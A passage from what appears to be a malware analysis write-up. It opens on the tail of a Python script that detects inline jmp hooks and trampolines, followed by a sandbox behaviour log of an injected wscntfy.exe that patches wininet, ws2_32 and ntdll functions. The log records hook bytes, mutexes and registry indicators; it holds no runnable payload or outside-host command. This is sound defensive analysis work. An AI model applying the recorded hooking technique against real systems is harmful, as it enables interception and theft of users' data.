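            continue                                   # not a 5-byte 'jmp' patch
        tramp, stolen = None, b""
        for (pid, ret), t in tramps.items():           # trampoline must jump back to hooked + len(stolen)
            n = len(t.data) - 5
            if pid == op.pid and ret == op.addr + n:
                tramp, stolen = t, t.data[:n]
                break
        orig = originals.get((op.pid, op.addr))
        match = None if orig is None or not stolen else orig.startswith(stolen)
        hooks.append(InlineHook(op.pid, op.addr, jmp_target(op.addr, op.data),
                                tramp.addr if tramp else None, stolen, match))
    return hooks


def analyse(lines: Optional[List[str]] = None) -> List[InlineHook]:
    return find_inline_hooks(parse_rows(SAMPLE_ROWS if lines is None else lines))


if __name__ == "__main__":
    for h in analyse():
        cave = f"{h.trampoline:08X}" if h.trampoline is not None else "none"
        print(f"pid {h.pid}: {h.hooked:08X} -> jmp {h.handler:08X}; trampoline {cave} "
              f"[{h.stolen.hex().upper()} + jmp back]; prologue check: {h.prologue_matches}")
```

Run against a full report, the script yields one line per hooked API per process: the patched address, the handler it diverts to (here always inside the injected region below the AExxxx/AFxxxx source addresses the tables report), and the code cave that carries the stolen prologue. A patch whose trampoline cannot be found, or whose stolen bytes do not match the prologue read beforehand, is worth a second look, since that is either a different hooking style or a log that was truncated by the "excessive behavior" cut-off.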
+ General
Start time: 06:06:44
Start date: 01/12/2011
Path: C:\WINDOWS\system32\wscntfy.exe
Commandline: C:\WINDOWS\system32\wscntfy.exe
Imagebase: 0x1000000
File size: 13824 bytes
MD5 hash: F92E1076C42FCD6DB3D72D8CFE9816D5
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 AF46EA
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
none query and write and read commit E50000 12288 own pid read write success or wait 1
none query and write and read commit E90000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown C20000 12288 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 AF4844
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 AF4844
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 AF4844
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 AF4844
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 AF4844
\KnownDlls\Normaliz.dll write and read and execute unknown C10000 36864 own pid read write conflicting addresses 1 AF4844
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 AF4844
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 AF4844
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 AF4844
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 AF4844
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 AF9F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 AF9FC6
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 AF9F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 AF9F86
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} object name exists 1 AF4C09
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1 AEC0F6
\BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} object name exists 1 AF4C09
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2508 236 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF9D4C
2516 236 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF9D4C
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E41AF7F 30 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1 AFA4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
236 C:\WINDOWS\system32\wscntfy.exe E00000 10 B8 35 00 00 00 E9 A9 D1 B0 7B success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 5 E9 33 B7 1D 84 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0000A 10 68 6C 02 00 00 E9 1E 63 B1 7B success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 5 E9 94 27 1D 84 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00014 10 8B FF 55 8B EC E9 7C 11 A1 7B success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 5 E9 CE 79 2D 84 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0001E 10 8B FF 55 8B EC E9 9B FA B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 5 E9 97 45 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00028 10 8B FF 55 8B EC E9 5C EE B5 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D95EE89 5 E9 20 52 19 C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00032 10 8B FF 55 8B EC E9 88 A6 BB 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D9BA6BF 5 E9 3E 9A 13 C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0003C 10 8B FF 55 8B EC E9 25 A6 BB 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D9BA666 5 E9 33 9B 13 C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00046 10 8B FF 55 8B EC E9 3D 90 B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D949088 5 E9 AD B1 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00050 10 8B FF 55 8B EC E9 F6 64 B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94654B 5 E9 2D DD 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0005A 10 8B FF 55 8B EC E9 22 33 B6 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D963381 5 E9 36 0F 19 C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00064 10 8B FF 55 8B EC E9 1A BF B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94BF83 5 E9 7E 83 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0006E 10 8B FF 55 8B EC E9 1A 87 B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94878D 5 E9 A0 BB 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00078 10 8B FF 55 8B EC E9 AE 3D CB 70 success or wait 1 AFA569
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
236 C:\WINDOWS\system32\wscntfy.exe D80000 C0F6A8 page read and write success or wait 1 AF4961
236 C:\WINDOWS\system32\wscntfy.exe D80000 C0F6AC page read and write success or wait 1 AF4961
236 C:\WINDOWS\system32\wscntfy.exe E00000 C0F47C page execute and read and write success or wait 1 AF1A36
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E00000 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe E00000 1000 page execute and read and write page execute and read and write success or wait 52 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 AFA5AD
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E0000A 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 AFA5AD
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E00014 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 AFA5AD
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E0001E 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 AFA5AD
236 C:\WINDOWS\system32\wscntfy.exe 3D95EE89 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E00028 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 AF72E5
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: C20000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 2001653529
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2001654987
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2001659123
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2001660561
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2001665470
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2001666863
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2001669840
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2001671320
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2001682103
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: C10000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2001687904
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2001694887
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2001698398
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2001709736
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2001829202
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2001830598
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: D80000 Length: C0F6A8 Allocation Type: null Protection: page read and write success or wait 2001836497
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: D80000 Length: C0F6AC Allocation Type: null Protection: page read and write success or wait 2001836771
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2001911417
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2001912122
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2001912691
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2001913251
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2001913814
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001914389
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001914967
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001915552
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001916128
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001917114
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001917812
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001918400
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001918969
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001919631
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001920208
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: C0F47C Allocation Type: null Protection: page execute and read and write success or wait 2001920946
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2001921735
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2001922032
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001922341
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001922623
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 B0 7B success or wait 2001922952
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2001923254
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 2001923547
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 1D 84 success or wait 2001923875
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2001924188
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2001924955
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2001925244
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0000A Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001925548
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001925839
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 B1 7B success or wait 2001926171
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2001926435
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 2001926726
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 5 Value: E9 94 27 1D 84 success or wait 2001927050
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2001927359
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2001928051
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 2001928339
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00014 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001928644
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001928936
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 A1 7B success or wait 2001929268
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2001929534
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 2001929825
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 5 Value: E9 CE 79 2D 84 success or wait 2001930153
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2001930462
